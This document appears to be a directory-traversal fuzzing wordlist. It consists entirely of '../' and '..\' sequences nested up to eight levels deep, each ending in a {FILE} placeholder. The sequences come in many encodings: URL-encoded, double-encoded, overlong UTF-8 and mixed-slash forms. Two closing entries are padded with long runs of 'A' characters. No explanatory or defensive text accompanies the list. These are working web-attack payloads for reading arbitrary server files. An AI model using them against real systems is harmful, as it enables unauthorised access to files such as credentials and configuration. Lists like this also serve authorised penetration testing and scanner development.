/%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}
|
||||
/..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}
|
||||
/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
|
||||
/..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
|
||||
/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
|
||||
/%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
|
||||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%5c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%5c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/\../{FILE}
|
||||
/\../\../{FILE}
|
||||
/\../\../\../{FILE}
|
||||
/\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../\../{FILE}
|
||||
/\../\../\../\../\../\../\../\../{FILE}
|
||||
//..\{FILE}
|
||||
//..\/..\{FILE}
|
||||
//..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\/..\{FILE}
|
||||
//..\/..\/..\/..\/..\/..\/..\/..\{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}
|
||||
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}
|
||||
